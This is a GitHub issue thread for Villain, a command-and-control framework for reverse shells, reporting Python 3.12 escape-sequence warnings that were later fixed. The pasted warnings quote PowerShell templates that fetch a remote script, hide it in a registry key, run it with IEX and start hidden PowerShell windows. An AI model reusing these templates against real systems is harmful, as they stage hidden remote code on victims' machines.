search

t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).
Other
3.75k stars 605 forks source link

invalid escape sequence #148

Closed D3vil0p3r closed 3 months ago

D3vil0p3r commented 5 months ago

Hello @t3l3machus when I run Villain, at the beginning I get the following output:

/home/athena/Villain/Villain.py:695: SyntaxWarning: invalid escape sequence '\w'
  if re.search('payload=[\w\/\\\]{0,}', word_frag):
/home/athena/Villain/Villain.py:965: SyntaxWarning: invalid escape sequence '\s'
  quoted_args_single = re.findall("'{1}[\s\S]*'{1}", user_input)
/home/athena/Villain/Villain.py:966: SyntaxWarning: invalid escape sequence '\s'
  quoted_args_double = re.findall('"{1}[\s\S]*"{1}', user_input)
/home/athena/Villain/Villain.py:1432: SyntaxWarning: invalid escape sequence '\{'
  reg_polution = f'New-Item -Path "HKCU:\SOFTWARE\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\SOFTWARE\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
/home/athena/Villain/Villain.py:1432: SyntaxWarning: invalid escape sequence '\{'
  reg_polution = f'New-Item -Path "HKCU:\SOFTWARE\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\SOFTWARE\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
/home/athena/Villain/Villain.py:1432: SyntaxWarning: invalid escape sequence '\S'
  reg_polution = f'New-Item -Path "HKCU:\SOFTWARE\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\SOFTWARE\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
/home/athena/Villain/Villain.py:1432: SyntaxWarning: invalid escape sequence '\S'
  reg_polution = f'New-Item -Path "HKCU:\SOFTWARE\{rand_key}" -Force | Out-Null;New-ItemProperty -Path "HKCU:\SOFTWARE\{rand_key}" -Name "{value_name}" -Value $(IRM -Uri {script_src} -UseBasicParsing) -PropertyType String | Out-Null;'
/home/athena/Villain/Villain.py:1433: SyntaxWarning: invalid escape sequence '\{'
  exec_script = f'(Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\{rand_key}\" -Name "{value_name}" | IEX) | Out-Null'
/home/athena/Villain/Villain.py:1433: SyntaxWarning: invalid escape sequence '\S'
  exec_script = f'(Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\{rand_key}\" -Name "{value_name}" | IEX) | Out-Null'
/home/athena/Villain/Villain.py:1434: SyntaxWarning: invalid escape sequence '\{'
  remove_src = f'Remove-Item -Path "HKCU:\Software\{rand_key}" -Recurse'
/home/athena/Villain/Villain.py:1434: SyntaxWarning: invalid escape sequence '\S'
  remove_src = f'Remove-Item -Path "HKCU:\Software\{rand_key}" -Recurse'
/home/athena/Villain/Core/villain_core.py:298: SyntaxWarning: invalid escape sequence '\w'
  return '\w' if path == 2 else f'({char}|\\?)'
/home/athena/Villain/Core/villain_core.py:307: SyntaxWarning: invalid escape sequence '\d'
  return '\d' if path == 2 else f'({char}|\\?)'
/home/athena/Villain/Core/villain_core.py:319: SyntaxWarning: invalid escape sequence '\W'
  return '\W' if path == 2 else f'({char}|\\?)'
/home/athena/Villain/Core/villain_core.py:334: SyntaxWarning: invalid escape sequence '\['
  if re.match( "^\[.*\}$", string):
/home/athena/Villain/Core/villain_core.py:454: SyntaxWarning: invalid escape sequence '\$'
  variables = re.findall("\$[A-Za-z0-9_]*={1}", payload)
/home/athena/Villain/Core/villain_core.py:508: SyntaxWarning: invalid escape sequence '\s'
  ps_parameters = re.findall("\s-[A-Za-z]*", payload)
/home/athena/Villain/Core/villain_core.py:2789: SyntaxWarning: invalid escape sequence '\d'
  allowed = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
/home/athena/Villain/Core/villain_core.py:2940: SyntaxWarning: invalid escape sequence '\S'
  sibling_server_id = re.findall("[\S]{1,2}echo '{[a-zA-Z0-9]{32}}'", cmd)[-1]
/home/athena/Villain/Core/villain_core.py:3059: SyntaxWarning: invalid escape sequence '\p'
  return 'Start-Process $PSHOME\powershell.exe -ArgumentList {' + execution_object + '} -WindowStyle Hidden'

I am using the latest commit of the tool. It is caused by Python 3.12 due to the replace of DeprecationWarning by SyntaxWarning: https://docs.python.org/3/whatsnew/3.12.html#other-language-changes

t3l3machus commented 5 months ago

@D3vil0p3r alright, thanks, I will check it asap.

D3vil0p3r commented 4 months ago

https://github.com/t3l3machus/Villain/pull/149

t3l3machus commented 3 months ago

Fixed :)